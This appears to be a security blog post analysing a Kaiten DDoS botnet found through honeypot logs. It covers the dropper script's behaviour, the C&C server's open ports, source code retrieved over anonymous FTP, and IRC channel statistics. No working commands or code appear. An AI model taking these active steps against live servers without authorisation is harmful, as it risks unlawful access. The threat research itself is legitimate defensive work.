While collecting stats from last month we did a nice discovery in the ssh logs from kippo.
( we talk about gb.sh )
It first came up at our splunk dashboard, and while checking the link it was still online. Curious to find out more about the file we started to dig into it.
We learned that the shell script is actually downloading another 6 files that are pre compiled and will be given executable rights, as last they will be started.
It is time to fire up IDA and check out what kind of binaries we have here.
The first file we disassembled was called ‘armv51’ and that was a direct hit! After investigation we found out that it actually is a compiled version of Kaiten ddos bot. Not long after that we also digged up the irc information including server + port, channel + password that the bots are using to join on the C&C server.
The botnet is configured to connect on IP basis and not on DNS, stupid ? yes! Hosting the botnet at OVH, stupid? yes!
While gathering more information about the C&C server nmap showed that several services are actually up.
21/tcp open ftp vsftpd 2.2.2
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
445/tcp filtered microsoft-ds
9001/tcp open irc Unreal ircd
Why do they need FTP ? maybe to spread ? actually connecting as anonymous user on the ftp is working and there is one file to be found in the public directory, called ktx.c. This file happens to be the source of there binary! already pre configured to there C&C server and correct channel.
For port 80 we already know why it is up and running, they do use it for spreading the batch file.
After creating a proxy that could take a hit, its time to connect to there irc server and see what these kiddies have running.
[Actual IRC logs]
> There are 594 users and 39 invisible on 1 servers
> 3 operator(s) online
> 2 channels formed
> I have 633 clients and 0 servers
> 633 945 Current local users 633, max 945
> 633 945 Current global users 633, max 945
> Successfully joined #evil on Saturday at 2:23pm
ERROR > 482: You’re not channel operator: #evil
> Channel Modes: +Mmnstu
It turns out to be controlled by 3 guy’s, that connect to the C&C server using there home IP, unless they have adsl proxy’s. After monitoring the channel for several days, we see that the botnet is mainly build up out of dsl lines and other home line types.
Top country’s detected
In 48 hours the botnet had been used for over 20 attacks, most of the IP’s did resolve back to customer ISP’s. 2 ddos attempts where fired at a hosting company’s.
Since the irc channel is in modes +Mmu we could not communicate with the bots and remove the malware.
Looking back at the whole discovery and the information above posted, we did not expect a criminal group that would ddos company’s to extract money. But dont think we are not looking for them =)
Provider OVH has been informed about this.